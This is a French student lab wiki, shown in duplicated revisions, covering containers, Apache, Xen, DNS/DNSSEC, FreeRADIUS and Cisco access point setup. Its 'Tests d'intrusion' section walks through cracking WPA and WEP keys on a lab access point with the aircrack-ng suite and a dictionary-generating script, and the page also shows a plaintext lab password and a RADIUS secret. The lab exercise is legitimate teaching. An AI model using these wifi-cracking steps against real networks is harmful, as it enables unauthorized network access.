On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.2 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49127TP sysres IMA5sc 2018/2019 G72018-12-21T18:01:04Z<p>Mcreteur : /* 6.1 Cryptage de données */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
